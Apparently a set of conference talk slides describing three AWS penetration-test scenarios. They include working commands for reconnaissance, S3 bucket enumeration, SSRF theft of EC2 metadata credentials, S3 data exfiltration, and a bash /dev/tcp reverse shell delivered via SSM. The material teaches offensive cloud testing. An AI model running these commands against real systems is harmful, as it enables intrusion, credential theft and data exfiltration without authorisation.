A collection of 3 scenarios from AWS penetration testing exercises over the years, covering misconfigurations and application security vulnerabilities that led to shells on EC2 instances and access to other services beyond the plane of attack.
One of the OWASP Bangalore Chapter leaders, along with Vandana and Prashant KV ☺ ▪ Several years of security experience breaking things (Offensive Security) ▪ All kinds of things (applications/mobile/systems/networks/wireless/cloud) ▪ Love testing applications and infra on the cloud, learning new things every day
to access systems and data beyond the plane of attack ▪ Demos of 3 cool scenarios we have encountered that allowed us to gain access to servers and data by chaining multiple vulnerabilities ▪ Possibly, talk about mitigations, if time permits, and share other stories that you folks may have
3 scenarios ❑ a code-level vulnerability that allows attackers to access data or execute code ❑ overly permissive policies assigned to roles used by accessible services ❑ the absence of logging that could otherwise have been used to stop the attacks after the initial foothold was obtained ❑ potentially sensitive data not encrypted at rest
CNAME, SOA and TXT records. This can tell you a lot about the underlying apps, the technology in use, and what the external infra looks like
dig NS galaxybutter.co
dig CNAME @ns-296.awsdns-37.com www.galaxybutter.co
dig TXT @ns-296.awsdns-37.com galaxybutter.co
a TCP SYN scan with script scanning and version detection, showing only open ports. -g80 sets the source port to 80, one of the firewall/IDS evasion techniques described in the nmap documentation
sudo nmap --open -Pn --top-ports 1000 -T4 -sS -g80 -sC -sV 54.211.12.132
do this. A personal favorite for quick results, and also one of the oldest tools written for this, is https://digi.ninja/projects/bucket_finder.php
In its simplest form, each word from a dictionary is prepended to .s3.amazonaws.com and a DNS A record lookup is performed; the presence of an A record means the bucket exists. Alternatively, an HTTPS request is made to the name: a 404 means bucket not found, anything else means the bucket exists.
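A minimal bash sketch of the HTTPS variant of this technique, assuming a wordlist file called words.txt (the file name and the use of curl are illustrative, not part of the original tool):
#!/bin/bash
# For each candidate word, probe word.s3.amazonaws.com over HTTPS.
# A 404 means no such bucket; any other status means the bucket exists.
while read -r word; do
  status=$(curl -s -o /dev/null -w "%{http_code}" "https://${word}.s3.amazonaws.com")
  if [ "$status" != "404" ]; then
    echo "Possible bucket: ${word}.s3.amazonaws.com (HTTP ${status})"
  fi
done < words.txt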
were discovered during the assessment ▪ Common AWS EC2 usernames were tried (ubuntu, ec2-user, root etc.) ▪ We were able to log in to 1 server
ssh -i sales-marketing-app.pem <username>@<server-ip>
able to execute code or read files on Linux ◦ Files inside the /home/* directory ◦ /etc/passwd ◦ /etc/hosts ◦ Files inside webroots if available ◦ /proc/self/environ
More things to do here - https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
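A quick loop one might run at this stage (a sketch; the file list mirrors the bullets above, and the authorized_keys path is an added example, not from the original slide):
#!/bin/bash
# Dump a few high-value files readable by the current user.
for f in /etc/passwd /etc/hosts /proc/self/environ /home/*/.ssh/authorized_keys; do
  echo "=== $f ==="
  cat "$f" 2>/dev/null
done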
page was discovered. The application had the ability to register new users ▪ We registered a new user and logged in ▪ The app's functionality allowed users to provide a URL; the app would then make a web request on their behalf ▪ Essentially, the server trusted user input for the URL it would use to make a request from the server side
that occurs when a service makes a request (HTTP or otherwise) to an endpoint whose address is controlled by the user, without sanitisation or whitelisting. This user-controlled request is made from the server. Can be used to ◦ make requests to internal applications/services ◦ port scan internal hosts using the behaviour and responses of the (lib)curl libraries ◦ on the cloud, access the metadata endpoint to retrieve EC2 instance information ◦ perform denial of service attacks by making requests that fetch large responses ◦ perform code execution by overflowing vulnerable services using service-specific payloads
… Virtual machines on the cloud across AWS, GCP, Azure, DigitalOcean and others have an endpoint, accessible only from the machine itself, called the metadata endpoint ▪ This is accessible at http://169.254.169.254 ▪ It contains information about the machine, its cloud-specific identifiers and any user data attached to it ▪ EC2 instances can also have an IAM role attached, which causes a temporary set of credentials to become available from the metadata endpoint
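For example, listing the top-level metadata categories from the instance itself (output varies by instance):
# Run on the EC2 instance (or via the SSRF): list available metadata categories
curl http://169.254.169.254/latest/meta-data/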
URL using the application's functionality leads to the name of the IAM role attached to the machine ◦ http://169.254.169.254/latest/meta-data/iam/security-credentials/ ▪ Accessing the IAM role name returns temporary tokens that can be used to impersonate the EC2 instance ◦ http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2serverhealthrole
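Shown here with curl for illustration; in the actual attack these URLs were supplied to the vulnerable URL parameter in the app:
# Step 1: discover the role name attached to the instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Step 2: fetch the temporary credentials for that role
# (returns AccessKeyId, SecretAccessKey, Token and Expiration as JSON)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2serverhealthrole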
profile in the AWS CLI
aws configure --profile stolencreds
Also edited the ~/.aws/credentials file to include the value of the aws_session_token variable ▪ Checked if the creds are set up properly using
aws sts get-caller-identity --profile stolencreds
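The resulting ~/.aws/credentials entry looks roughly like this (all values are placeholders):
[stolencreds]
aws_access_key_id = ASIA-EXAMPLE-KEY-ID
aws_secret_access_key = SECRET-KEY-FROM-METADATA
aws_session_token = SESSION-TOKEN-FROM-METADATA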
that gave the creds the ability to perform actions beyond the EC2 instance
aws s3 ls --profile stolencreds
aws s3 ls s3://data.serverhealth-corporation --profile stolencreds
aws s3 sync s3://data.serverhealth-corporation . --profile stolencreds
it is possible to execute commands and retrieve output using the AWS CLI or programmatically ▪ More about this - https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-agent.html ▪ Basically, you use the CLI to send a command to the AWS SSM service; the agent running on the instance is contacted, the command is run as root and the output is made available via another service endpoint
SSM, the user or IAM role whose credentials are being used must have the AmazonEC2RoleforSSM policy attached ▪ Also, the Amazon SSM Agent must be running on the instance. It is pre-installed on multiple Amazon Machine Images released after November 2016 ▪ Commands can be executed using an API call and the output read via another API call, as sketched below ▪ Commands are run as a user called ssm-user, who has sudoers rights on Linux and is in the Administrators local group on Windows images
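A sketch of the two-call pattern, assuming a placeholder instance ID of i-0123456789abcdef0 and the stolencreds profile from earlier:
# Call 1: send a shell command to the instance via SSM
aws ssm send-command \
  --document-name "AWS-RunShellScript" \
  --instance-ids "i-0123456789abcdef0" \
  --parameters 'commands=["id; hostname"]' \
  --query "Command.CommandId" --profile stolencreds
# Call 2: read the output using the CommandId returned above
aws ssm get-command-invocation \
  --command-id "COMMAND-ID-FROM-PREVIOUS-CALL" \
  --instance-id "i-0123456789abcdef0" --profile stolencreds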
called reverse-shell.sh and upload it to a public S3 bucket. This has to be an S3 bucket and cannot be any other hosting on the Internet. Edit the placeholders.
#!/bin/bash
bash -i >& /dev/tcp/IP-OF-REVERSE-SHELL-CATCHER/9999 0>&1
Run netcat to catch the reverse shell ◦ nc -lvp 9999
Run the following SSM command to get a reverse shell connecting to the IP where nc is running
◦ aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash reverse-shell.sh"]}' --query "Command.CommandId"
a static HTML site with functionality to upload files ▪ The site itself was hosted on S3 ▪ A quick review of the JS and analysis of the HTTP traffic using Burp made it evident that the site was adding content to an S3 bucket ▪ How was the static site writing files to a bucket, you ask?
were added to the AWS CLI as a different profile, and a tool called ScoutSuite was run with the credentials to see what kind of access the IAM user had
aws configure --profile uploadcreds
ScoutSuite can be obtained from - https://github.com/nccgroup/ScoutSuite
scout --profile uploadcreds
This returned a complete picture of the AWS infrastructure, because the user had the AdministratorAccess policy attached as a permission
lambda functions ▪ One of them performed a rudimentary function: it accepted user input and returned the md5sum of the string
https://ntf9ood72h.execute-api.us-east-1.amazonaws.com/api/hello
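Invoking it might look like the following; the query parameter name is a guess for illustration, since only the endpoint is shown:
# Hypothetical invocation of the md5sum Lambda behind API Gateway
curl "https://ntf9ood72h.execute-api.us-east-1.amazonaws.com/api/hello?input=test"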
that we now had, we downloaded the lambda for analysis
aws lambda list-functions --profile uploadcreds
aws lambda get-function --function-name lambda-name-here-from-previous-query --query 'Code.Location' --profile uploadcreds
wget -O lambda-function.zip url-from-previous-query
(the Code.Location URL is pre-signed, so wget needs no AWS profile)
The downloaded zip contains the code for the lambda.
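A quick next step one might take with the downloaded code (a sketch; the grep patterns are illustrative):
# Unpack the function code and search it for likely hardcoded secrets
unzip lambda-function.zip -d lambda-src
grep -rniE "secret|key|token|password" lambda-src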
AWS account and found multiple machines
aws ec2 describe-instances --profile uploadcreds
As a proof of concept, we were able to show code execution on one of the servers using SSM, as well as using the new EC2 Instance Connect short-lived SSH access for AWS
https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
This is left as an exercise for the reader. The next slide has the command and the output.
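For reference, the EC2 Instance Connect flow looks roughly like this (instance ID, availability zone, OS user and key paths are placeholders):
# Push a temporary public key to the instance (valid for 60 seconds)
aws ec2-instance-connect send-ssh-public-key \
  --instance-id "i-0123456789abcdef0" \
  --availability-zone "us-east-1a" \
  --instance-os-user ec2-user \
  --ssh-public-key file://my_key.pub \
  --profile uploadcreds
# Then SSH in with the matching private key before the window closes
ssh -i my_key ec2-user@<instance-public-ip>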
evident now, the most common themes are misconfiguration of services, insecure programming, and permissions that should not have been granted ▪ Reconnaissance and OSINT are key for a lot of cloud services and applications. When attacking apps and servers, it is important to identify key DNS, whois, IP history and sub-domain information ▪ Post exploitation has no limits with the cloud. You can attack additional services, disrupt logging, make code changes to attack users – your imagination (and the agreement with your client) is the limit ☺ ▪ There are a ton of tools that security folks have written on GitHub, and a lot of work is being done in the attack and exploitation areas ▪ The key to learning to attack is to Setup > Break > Learn > Repeat